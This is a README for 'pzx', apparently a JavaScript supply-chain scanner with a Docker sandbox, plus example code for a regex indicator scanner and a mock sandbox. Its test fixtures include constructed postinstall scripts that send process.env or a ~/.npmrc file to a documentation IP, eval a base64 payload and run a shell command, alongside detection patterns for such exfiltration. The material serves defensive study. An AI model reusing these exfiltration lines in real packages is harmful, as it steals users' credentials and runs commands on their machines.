
Package Zero-trust eXecute

Secure JavaScript ecosystem supply chain. Advanced SCA and isolated runtime validation.



Scans your filesystem, resolves real installed versions, checks OSV for CVEs, runs supply chain heuristics, performs AST analysis with Bun.Transpiler, and detonates suspicious packages in a sandboxed environment. Zero dependencies.

Usage

bunx @georgegiosue/pzx lodash
bunx @georgegiosue/pzx [package] [version] [--root <path>] [--home] [--lang <lang>] [--run <file>] [--help]
bunx @georgegiosue/pzx                              # scan ALL installed packages
bunx @georgegiosue/pzx lodash 4.17.20               # check specific package
bunx @georgegiosue/pzx express --home               # scan from home directory
bunx @georgegiosue/pzx @babel/core -r ~/projects    # scan specific path
bunx @georgegiosue/pzx lodash --lang es             # output in Spanish
bunx @georgegiosue/pzx --run suspicious.js          # detonate a JS file directly

Without arguments, pzx enters full scan mode: discovers every installed package, runs static analysis locally, and only queries external APIs for packages flagged as suspicious.

Analysis Engines

Engine     | What it does
-----------|---------------------------------------------------------------
OSV        | Checks installed versions against known CVEs
Registry   | Detects abandonment, deprecation, quarantine, typosquatting
Regex IoC  | eval(), child_process, base64, IP URLs, env exfiltration
AST        | Bun.Transpiler import scanning for sensitive system modules
Dep audit  | Random names, URL/IP/file versions in sub-dependencies
Sandbox    | Detonates suspicious packages with intercepted fetch, fs, exec
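To make the "Regex IoC" row concrete, here is an added example of a minimal regex-based indicator scanner in the same spirit. It is illustrative code written for this page, not pzx's own engine: the pattern set, the severities, the env-exfiltration proximity heuristic and the two-file sample package are all constructed (203.0.113.10 is an RFC 5737 documentation address). The exit code follows the README's convention of 0 for clean and 2 for findings.

```javascript
// Added example (not pzx's own code): a minimal regex-based IoC scanner in the
// spirit of the "Regex IoC" engine. Patterns, severities and the sample package
// are constructed for illustration.

// Each pattern corresponds to one indicator class from the engine table.
const IOC_PATTERNS = [
  { id: "eval", severity: "high",
    re: /\beval\s*\(|new\s+Function\s*\(/g },
  { id: "child_process", severity: "high",
    re: /require\s*\(\s*["']child_process["']\s*\)|from\s+["']child_process["']/g },
  { id: "base64_blob", severity: "medium",
    // a long quoted run of base64-alphabet characters, typical of packed payloads
    re: /["'][A-Za-z0-9+/]{80,}={0,2}["']/g },
  { id: "ip_url", severity: "high",
    re: /https?:\/\/(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/g },
];

// Network sinks that, when close to a process.env read, suggest env exfiltration.
const NETWORK_SINK = /\b(?:fetch|https?\.request|https?\.get|XMLHttpRequest)\s*\(/g;
const ENV_READ = /process\.env\b/g;

// 1-based line number of a character offset in `src`.
function lineOf(src, index) {
  let line = 1;
  for (let i = 0; i < index; i++) if (src.charCodeAt(i) === 10) line++;
  return line;
}

// Flags a file once if any process.env read and any network sink lie within
// `windowChars` of each other, in either order (env-then-fetch or fetch(...env)).
function checkEnvExfil(file, src, windowChars = 300) {
  const envIdx = [...src.matchAll(ENV_READ)].map((m) => m.index);
  const sinkIdx = [...src.matchAll(NETWORK_SINK)].map((m) => m.index);
  for (const e of envIdx) {
    for (const s of sinkIdx) {
      if (Math.abs(e - s) <= windowChars) {
        return [{ file, id: "env_exfil", severity: "high",
                  line: lineOf(src, Math.min(e, s)), match: "process.env near network call" }];
      }
    }
  }
  return [];
}

function scanSource(file, src) {
  const findings = [];
  for (const { id, severity, re } of IOC_PATTERNS) {
    re.lastIndex = 0; // the patterns are shared global regexes
    let m;
    while ((m = re.exec(src)) !== null) {
      findings.push({ file, id, severity, line: lineOf(src, m.index), match: m[0].slice(0, 60) });
    }
  }
  return findings.concat(checkEnvExfil(file, src));
}

// `files` maps a path inside the package to its source text.
function scanPackage(files) {
  return Object.entries(files).flatMap(([file, src]) => scanSource(file, src));
}

// Mirrors the README's exit codes: 0 clean, 2 findings.
function exitCodeFor(findings) {
  return findings.length > 0 ? 2 : 0;
}

// Constructed two-file package: a harmless entry point and a postinstall
// script that exhibits every indicator class. 203.0.113.10 is a documentation
// address (RFC 5737), not a real endpoint.
const SAMPLE_PACKAGE = {
  "index.js": "module.exports = function chunk(arr, size) { return arr.slice(0, size); };",
  "postinstall.js": [
    'const cp = require("child_process");',
    `const payload = Buffer.from("${"QUJD".repeat(24)}", "base64").toString();`,
    'fetch("http://203.0.113.10:8080/c", { method: "POST", body: JSON.stringify(process.env) });',
    "eval(payload);",
  ].join("\n"),
};

const demoFindings = scanPackage(SAMPLE_PACKAGE);
for (const f of demoFindings) console.log(`${f.file}:${f.line} [${f.severity}] ${f.id} ${f.match}`);
console.log("exit code", exitCodeFor(demoFindings));
```

The proximity window for env exfiltration is deliberately loose: a single regex that requires `process.env` before `fetch(` would miss `fetch(url, { body: JSON.stringify(process.env) })`, so the check looks for both tokens within a character window in either order. Expect false positives from this class of heuristic on legitimate build tooling; that is why pzx treats regex hits as a reason to detonate rather than as a verdict.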

Sandbox

Packages flagged by static analysis are executed in an isolated Docker container:

  • Docker isolation: --network=none, --read-only, --memory=128m, --cpus=0.5
  • Mock environment intercepts fetch, fs, child_process, http/https inside the container
  • Empty env — no AWS_SECRET_KEY, no NPM_TOKEN, nothing to steal
  • 5000ms timeout — kills the container if it blocks (C2 wait, infinite loop)
  • Violations are classified: NETWORK, EXEC, FS_READ
  • Docker is required for sandbox execution — no fallback to host execution
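The interception and classification part of the sandbox can be illustrated in plain Node.js. The following is an added example, not pzx's own sandbox code: a mock environment that stubs `fetch`, `fs`, `child_process` and `http`/`https`, runs a script body against an empty `process.env`, and reports what it tried to do as NETWORK, EXEC or FS_READ. It provides no isolation by itself (pzx runs this kind of instrumentation inside the Docker container described above) and does not reproduce the 5000ms timeout; the fixtures, the `SUSPICIOUS`/`CLEAN` verdict names and the stub behaviour are constructed for this page.

```javascript
// Added example (not pzx's own code): an in-process mock environment that
// intercepts fetch, fs, child_process and http/https and classifies calls as
// NETWORK, EXEC or FS_READ. It is instrumentation only, not isolation; pzx
// runs the real thing inside Docker with --network=none. The timeout is not
// reproduced here. All fixtures are constructed.

function makeMockEnvironment() {
  const violations = [];
  const record = (type, detail) => violations.push({ type, detail: String(detail) });

  // Every read-style fs call is reported; nothing touches the real filesystem.
  const fsMock = {
    readFileSync: (p) => { record("FS_READ", p); return ""; },
    readFile: (p, ...rest) => {
      record("FS_READ", p);
      const cb = rest[rest.length - 1];
      if (typeof cb === "function") cb(null, "");
    },
    existsSync: (p) => { record("FS_READ", p); return false; },
    readdirSync: (p) => { record("FS_READ", p); return []; },
  };

  const cpMock = {
    exec: (cmd) => { record("EXEC", cmd); },
    execSync: (cmd) => { record("EXEC", cmd); return ""; },
    spawn: (cmd, args = []) => { record("EXEC", [cmd, ...args].join(" ")); return { on() { return this; } }; },
  };

  // A dead request object so callers chaining .on/.write/.end do not throw.
  const deadRequest = { on() { return this; }, write() { return true; }, end() {} };
  const asUrl = (u) => (typeof u === "string" ? u : JSON.stringify(u));
  const httpMock = {
    request: (url) => { record("NETWORK", asUrl(url)); return deadRequest; },
    get: (url) => { record("NETWORK", asUrl(url)); return deadRequest; },
  };

  // Resolves (never rejects) with an empty response so un-awaited calls cannot
  // crash the harness with an unhandled rejection.
  const fetchMock = (url) => {
    record("NETWORK", asUrl(url));
    return Promise.resolve({ ok: false, status: 0, text: async () => "", json: async () => ({}) });
  };

  // Only the intercepted modules are resolvable; anything else is refused.
  const mockRequire = (name) => {
    switch (String(name).replace(/^node:/, "")) {
      case "fs": return fsMock;
      case "child_process": return cpMock;
      case "http":
      case "https": return httpMock;
      default: throw new Error(`module "${name}" is not available in the sandbox`);
    }
  };

  return { violations, mockRequire, fetchMock };
}

// Runs `src` as a CommonJS-style module body against the mock environment and
// an empty process.env, then returns the classified violations.
function detonate(src) {
  const env = makeMockEnvironment();
  const mod = { exports: {} };
  let error = null;
  try {
    const body = new Function("require", "fetch", "process", "module", "exports", src);
    body(env.mockRequire, env.fetchMock, { env: {}, platform: "sandbox" }, mod, mod.exports);
  } catch (e) {
    error = e.message;
  }
  return {
    violations: env.violations,
    error,
    verdict: env.violations.length > 0 ? "SUSPICIOUS" : "CLEAN",
  };
}

// Constructed fixtures: a benign module and a postinstall-style script that
// reads a credentials file, posts it to a documentation-range IP (RFC 5737)
// and runs a command. With the empty env, process.env.HOME is undefined.
const BENIGN = "module.exports = (a, b) => a + b;";
const SUSPECT = [
  'const fs = require("fs");',
  'const cp = require("child_process");',
  'const creds = fs.readFileSync(process.env.HOME + "/.npmrc", "utf8");',
  'fetch("http://203.0.113.10/collect", { method: "POST", body: creds });',
  'cp.exec("id");',
].join("\n");

console.log(JSON.stringify(detonate(SUSPECT), null, 2));
```

Two design points carry over to a real sandbox. First, the stubs must never throw on the interception path, otherwise a malicious script fails before it reveals its second and third actions; the `fetch` stub resolving instead of rejecting is the same idea. Second, the empty `process.env` is both a mitigation and a signal: a script that reads `process.env.HOME` gets `undefined`, and the resulting `undefined/.npmrc` path in the FS_READ record shows exactly what it was looking for.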

Exit Codes

0 no vulnerabilities | 1 error | 2 vulnerabilities found

License

MIT

Acknowledgements

Most (if not all) of this was built by AI xd
